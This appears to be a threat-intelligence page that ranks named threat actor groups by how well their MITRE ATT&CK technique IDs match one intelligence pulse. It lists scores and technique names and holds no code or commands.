Link to MITRE →

Patchwork

Score: 18.34
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1555.003 - Credentials from Web Browsers
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
Link to MITRE →

Whitefly

Score: 5.71
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1059 - Command and Scripting Interpreter
  • T1588.002 - Tool
Link to MITRE →

APT19

Score: 10.81
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1588.002 - Tool
  • T1027.010 - Command Obfuscation
  • T1189 - Drive-by Compromise
Link to MITRE →

TA2541

Score: 16.83
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1055 - Process Injection
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.002 - Software Packing
Link to MITRE →

Earth Lusca

Score: 33.03
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1584.006 - Web Services
  • T1059.006 - Python
  • T1189 - Drive-by Compromise
Link to MITRE →

SideCopy

Score: 16.57
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1518.001 - Security Software Discovery
  • T1518 - Software Discovery
Link to MITRE →

Leviathan

Score: 20.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1041 - Exfiltration Over C2 Channel
  • T1534 - Internal Spearphishing
  • T1587.004 - Exploits
  • T1589.001 - Credentials
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
Link to MITRE →

Tonto Team

Score: 11.85
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1090.002 - External Proxy
  • T1210 - Exploitation of Remote Services
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
Link to MITRE →

Andariel

Score: 6.51
Matched TTPs:
  • T1204.002 - Malicious File
  • T1588.001 - Malware
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
Link to MITRE →

BRONZE BUTLER

Score: 17.81
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery
Link to MITRE →

APT38

Score: 31.85
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1218.005 - Mshta
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1486 - Data Encrypted for Impact
  • T1036.003 - Rename Legitimate Utilities
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
  • T1529 - System Shutdown/Reboot
Link to MITRE →

MuddyWater

Score: 40.80
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1218.003 - CMSTP
  • T1555.003 - Credentials from Web Browsers
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1552.001 - Credentials In Files
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1027.004 - Compile After Delivery
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1027.010 - Command Obfuscation
  • T1518 - Software Discovery
Link to MITRE →

Naikon

Score: 7.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1518.001 - Security Software Discovery
Link to MITRE →

Molerats

Score: 6.13
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1555.003 - Credentials from Web Browsers
Link to MITRE →

admin@338

Score: 6.27
Matched TTPs:
  • T1204.002 - Malicious File
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1203 - Exploitation for Client Execution

Gamaredon Group

Score: 34.41
Matched TTPs:
  • T1204.002 - Malicious File
  • T1497.001 - System Checks
  • T1608.001 - Upload Malware
  • T1055 - Process Injection
  • T1090 - Proxy
  • T1218.005 - Mshta
  • T1027.012 - LNK Icon Smuggling
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1534 - Internal Spearphishing
  • T1588.002 - Tool
  • T1027.004 - Compile After Delivery
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion

Darkhotel

Score: 14.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1497.001 - System Checks
  • T1016 - System Network Configuration Discovery
  • T1497.002 - User Activity Based Checks
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1189 - Drive-by Compromise

APT32

Score: 34.47
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1055 - Process Injection
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1203 - Exploitation for Client Execution
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise

The White Company

Score: 7.61
Matched TTPs:
  • T1204.002 - Malicious File
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing

IndigoZebra

Score: 3.65
Matched TTPs:
  • T1204.002 - Malicious File
  • T1583.006 - Web Services
  • T1588.002 - Tool

APT33

Score: 7.71
Matched TTPs:
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution

Silence

Score: 13.53
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1090.002 - External Proxy
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion

Sidewinder

Score: 20.42
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1518 - Software Discovery

Confucius

Score: 8.61
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1203 - Exploitation for Client Execution

BlackTech

Score: 6.34
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution

Windshift

Score: 9.39
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1518.001 - Security Software Discovery
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery

Scattered Spider

Score: 41.04
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1598.003 - Spearphishing Link
  • T1598.004 - Spearphishing Voice
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1552.001 - Credentials In Files
  • T1021.007 - Cloud Services
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1556.009 - Conditional Access Policies
  • T1213.003 - Code Repositories
  • T1538 - Cloud Service Dashboard

Storm-0501

Score: 21.97
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1190 - Exploit Public-Facing Application
  • T1036.004 - Masquerade Task or Service
  • T1021.007 - Cloud Services
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1556.009 - Conditional Access Policies
  • T1027.002 - Software Packing

Evilnum

Score: 6.55
Matched TTPs:
  • T1497.001 - System Checks
  • T1574.001 - DLL
  • T1070.004 - File Deletion

Volt Typhoon

Score: 53.31
Matched TTPs:
  • T1497.001 - System Checks
  • T1007 - System Service Discovery
  • T1070.007 - Clear Network Connection History and Configurations
  • T1190 - Exploit Public-Facing Application
  • T1218 - System Binary Proxy Execution
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1584.005 - Botnet
  • T1591 - Gather Victim Org Information
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1587.004 - Exploits
  • T1591.004 - Identify Roles
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1518 - Software Discovery
  • T1596.005 - Scan Databases
  • T1090.001 - Internal Proxy

Silent Librarian

Score: 7.15
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1608.005 - Link Target
  • T1588.002 - Tool

ZIRCONIUM

Score: 21.93
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1218.007 - Msiexec
  • T1036 - Masquerading
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1059.006 - Python
  • T1027.002 - Software Packing

Cinnamon Tempest

Score: 8.74
Matched TTPs:
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1090 - Proxy
  • T1588.002 - Tool
  • T1059.006 - Python

Velvet Ant

Score: 17.03
Matched TTPs:
  • T1574.001 - DLL
  • T1071 - Application Layer Protocol
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1090.001 - Internal Proxy
  • T1211 - Exploitation for Defense Evasion

Aquatic Panda

Score: 21.24
Matched TTPs:
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1595.002 - Vulnerability Scanning
  • T1574.006 - Dynamic Linker Hijacking
  • T1588.001 - Malware
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion

APT3

Score: 20.71
Matched TTPs:
  • T1574.001 - DLL
  • T1555.003 - Credentials from Web Browsers
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1552.001 - Credentials In Files
  • T1041 - Exfiltration Over C2 Channel
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing

BackdoorDiplomacy

Score: 8.61
Matched TTPs:
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1588.001 - Malware
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool

HAFNIUM

Score: 12.42
Matched TTPs:
  • T1583.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1584.005 - Botnet
  • T1583.006 - Web Services

INC Ransom

Score: 9.48
Matched TTPs:
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1070.004 - File Deletion

BlackByte

Score: 21.44
Matched TTPs:
  • T1562 - Impair Defenses
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1016 - System Network Configuration Discovery
  • T1041 - Exfiltration Over C2 Channel
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion

Mustard Tempest

Score: 3.74
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1189 - Drive-by Compromise

APT42

Score: 8.24
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery

GOLD SOUTHFIELD

Score: 6.26
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1195.002 - Compromise Software Supply Chain
  • T1027.010 - Command Obfuscation

Fox Kitten

Score: 18.67
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1552.001 - Credentials In Files
  • T1210 - Exploitation of Remote Services
  • T1027.010 - Command Obfuscation

ToddyCat

Score: 5.71
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1518.001 - Security Software Discovery

Blue Mockingbird

Score: 4.66
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1090 - Proxy
  • T1588.002 - Tool

Volatile Cedar

Score: 8.19
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1595.003 - Wordlist Scanning

Akira

Score: 6.88
Matched TTPs:
  • T1558 - Steal or Forge Kerberos Tickets
  • T1486 - Data Encrypted for Impact

Carbanak

Score: 5.29
Matched TTPs:
  • T1562.004 - Disable or Modify System Firewall
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool

Stealth Falcon

Score: 7.84
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1041 - Exfiltration Over C2 Channel

Leafminer

Score: 9.05
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1027.010 - Command Obfuscation
  • T1189 - Drive-by Compromise

LAPSUS$

Score: 22.74
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1598.004 - Spearphishing Voice
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1588.002 - Tool
  • T1589.001 - Credentials
  • T1591.004 - Identify Roles
  • T1213.003 - Code Repositories

FIN5

Score: 7.32
Matched TTPs:
  • T1090.002 - External Proxy
  • T1059 - Command and Scripting Interpreter
  • T1588.002 - Tool
  • T1070.004 - File Deletion

Lotus Blossom

Score: 5.25
Matched TTPs:
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
  • T1090.001 - Internal Proxy

Deep Panda

Score: 3.29
Matched TTPs:
  • T1546.008 - Accessibility Features

CopyKittens

Score: 3.19
Matched TTPs:
  • T1090 - Proxy
  • T1588.002 - Tool

MoustachedBouncer

Score: 4.39
Matched TTPs:
  • T1090 - Proxy
  • T1027.002 - Software Packing

Windigo

Score: 9.19
Matched TTPs:
  • T1090 - Proxy
  • T1059 - Command and Scripting Interpreter
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery

POLONIUM

Score: 5.20
Matched TTPs:
  • T1090 - Proxy
  • T1583.006 - Web Services
  • T1588.002 - Tool

Metador

Score: 4.69
Matched TTPs:
  • T1588.001 - Malware
  • T1588.002 - Tool
  • T1070.004 - File Deletion

Equation

Score: 8.26
Matched TTPs:
  • T1564.005 - Hidden File System
  • T1480.001 - Environmental Keying

Strider

Score: 7.06
Matched TTPs:
  • T1564.005 - Hidden File System
  • T1090.001 - Internal Proxy

Threat actors related to this Pulse (inference-based)

APT41

Score: 0.70
Matched TTPs:
  • T1595.002 - Vulnerability Scanning
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1203 - Exploitation for Client Execution
  • T1213.003 - Code Repositories
  • T1480.001 - Environmental Keying
  • T1218.001 - Compiled HTML File
  • T1595.003 - Wordlist Scanning
  • T1003.002 - Security Account Manager
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1070.004 - File Deletion
  • T1195.002 - Compromise Software Supply Chain
  • T1486 - Data Encrypted for Impact
  • T1574.006 - Dynamic Linker Hijacking
  • T1014 - Rootkit
  • T1546.008 - Accessibility Features
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1574.001 - DLL
  • T1027.002 - Software Packing
  • T1555.003 - Credentials from Web Browsers
  • T1596.005 - Scan Databases

Mustang Panda

Score: 0.70
Matched TTPs:
  • T1129 - Shared Modules
  • T1583.006 - Web Services
  • T1203 - Exploitation for Client Execution
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1041 - Exfiltration Over C2 Channel
  • T1608 - Stage Capabilities
  • T1678 - Delay Execution
  • T1176.002 - IDE Extensions
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
  • T1204.002 - Malicious File
  • T1059 - Command and Scripting Interpreter
  • T1027.012 - LNK Icon Smuggling
  • T1588.002 - Tool
  • T1574.001 - DLL
  • T1598.003 - Spearphishing Link
  • T1574.005 - Executable Installer File Permissions Weakness
  • T1027.007 - Dynamic API Resolution
  • T1593 - Search Open Websites/Domains
  • T1587.001 - Malware

Kimsuky

Score: 0.69
Matched TTPs:
  • T1027.010 - Command Obfuscation
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1583.006 - Web Services
  • T1591 - Gather Victim Org Information
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1041 - Exfiltration Over C2 Channel
  • T1070.004 - File Deletion
  • T1552.001 - Credentials In Files
  • T1204.002 - Malicious File
  • T1588.005 - Exploits
  • T1007 - System Service Discovery
  • T1027.012 - LNK Icon Smuggling
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1059.006 - Python
  • T1518.001 - Security Software Discovery
  • T1562.004 - Disable or Modify System Firewall
  • T1598.003 - Spearphishing Link
  • T1027.002 - Software Packing
  • T1555.003 - Credentials from Web Browsers
  • T1534 - Internal Spearphishing
  • T1593 - Search Open Websites/Domains
  • T1587.001 - Malware

UNC3886

Score: 0.62
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1059.006 - Python
  • T1190 - Exploit Public-Facing Application
  • T1554 - Compromise Host Software Binary
  • T1675 - ESXi Administration Command
  • T1562.004 - Disable or Modify System Firewall
  • T1203 - Exploitation for Client Execution
  • T1673 - Virtual Machine Discovery
  • T1588.001 - Malware
  • T1587.004 - Exploits
  • T1059.012 - Hypervisor CLI
  • T1505.006 - vSphere Installation Bundles
  • T1070.004 - File Deletion
  • T1681 - Search Threat Vendor Data
  • T1070.007 - Clear Network Connection History and Configurations
  • T1014 - Rootkit
  • T1587.001 - Malware

Volt Typhoon

Score: 0.62
Matched TTPs:
  • T1584.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1591 - Gather Victim Org Information
  • T1218 - System Binary Proxy Execution
  • T1016 - System Network Configuration Discovery
  • T1497.001 - System Checks
  • T1090.001 - Internal Proxy
  • T1587.004 - Exploits
  • T1090 - Proxy
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
  • T1591.004 - Identify Roles
  • T1007 - System Service Discovery
  • T1070.007 - Clear Network Connection History and Configurations
  • T1588.002 - Tool
  • T1027.002 - Software Packing
  • T1555.003 - Credentials from Web Browsers
  • T1593 - Search Open Websites/Domains
  • T1596.005 - Scan Databases

Sandworm Team

Score: 0.58
Matched TTPs:
  • T1595.002 - Vulnerability Scanning
  • T1190 - Exploit Public-Facing Application
  • T1584.005 - Botnet
  • T1027.010 - Command Obfuscation
  • T1203 - Exploitation for Client Execution
  • T1608.001 - Upload Malware
  • T1195 - Supply Chain Compromise
  • T1041 - Exfiltration Over C2 Channel
  • T1090 - Proxy
  • T1070.004 - File Deletion
  • T1195.002 - Compromise Software Supply Chain
  • T1204.002 - Malicious File
  • T1486 - Data Encrypted for Impact
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1598.003 - Spearphishing Link
  • T1555.003 - Credentials from Web Browsers
  • T1499 - Endpoint Denial of Service
  • T1213.006 - Databases
  • T1593 - Search Open Websites/Domains
  • T1587.001 - Malware

Magic Hound

Score: 0.56
Matched TTPs:
  • T1595.002 - Vulnerability Scanning
  • T1190 - Exploit Public-Facing Application
  • T1027.010 - Command Obfuscation
  • T1583.006 - Web Services
  • T1573 - Encrypted Channel
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1114.001 - Local Email Collection
  • T1070.004 - File Deletion
  • T1204.002 - Malicious File
  • T1486 - Data Encrypted for Impact
  • T1591.001 - Determine Physical Locations
  • T1189 - Drive-by Compromise
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1562.004 - Disable or Modify System Firewall
  • T1598.003 - Spearphishing Link
  • T1071 - Application Layer Protocol
  • T1589.001 - Credentials
  • T1562 - Impair Defenses

FIN7

Score: 0.56
Matched TTPs:
  • T1027.010 - Command Obfuscation
  • T1190 - Exploit Public-Facing Application
  • T1583.006 - Web Services
  • T1591 - Gather Victim Org Information
  • T1608.001 - Upload Malware
  • T1218.005 - Mshta
  • T1674 - Input Injection
  • T1195.002 - Compromise Software Supply Chain
  • T1204.002 - Malicious File
  • T1486 - Data Encrypted for Impact
  • T1059 - Command and Scripting Interpreter
  • T1591.004 - Identify Roles
  • T1497.002 - User Activity Based Checks
  • T1210 - Exploitation of Remote Services
  • T1608.005 - Link Target
  • T1588.002 - Tool
  • T1036.004 - Masquerade Task or Service
  • T1562.004 - Disable or Modify System Firewall
  • T1587.001 - Malware

Related CVEs

No CVEs were found in this Pulse.

Pulse – Threat Actor Graph

